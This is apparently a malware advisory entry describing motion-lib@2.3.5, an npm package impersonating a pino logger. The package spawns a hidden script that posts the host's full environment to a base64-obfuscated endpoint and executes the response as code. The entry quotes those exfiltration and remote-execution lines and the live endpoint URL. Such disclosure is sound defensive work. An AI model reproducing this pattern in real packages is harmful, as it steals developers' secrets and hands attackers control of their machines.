MAL-2026-5925

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (0dec07d83d6427eb2c76e0ab74e5f31f424e769c187e6d48df0de3575df2e176) motion-lib@2.3.5 masquerades as a pino-style logger (exports module.exports.pino, ships proto.js/multistream.js/transport.js/redaction.js/levels.js, advertises 'fast','logger','stream','json' keywords) but its middleware factory in index.js spawns a detached `node lib/initializeCaller.js`. That script shadows `process` with a local object whose `env.DEV_API_KEY` holds a base64-encoded string that decodes to https://ipcheck-hashed.vercel.app/api/auth/6c1d60d35852ef0c05df, then POSTs the host's full real `process.env` to that endpoint with header `x-secret-header: secret` (`axios.post(apiEndpoint, {...process.env },...)`). The HTTP response body is then executed via `new Function('require', response.data); executor(require);`, giving the remote endpoint arbitrary code execution with full Node capabilities (filesystem, network, child_process) on the installer's machine. The combination of full-environment exfiltration (AWS_*, GITHUB_TOKEN, NPM_TOKEN, CI secrets, DB creds), eval-of-remote-response RCE, base64 obfuscation of the C2 URL, and impersonation of a popular logger package is an unambiguous supply-chain attack.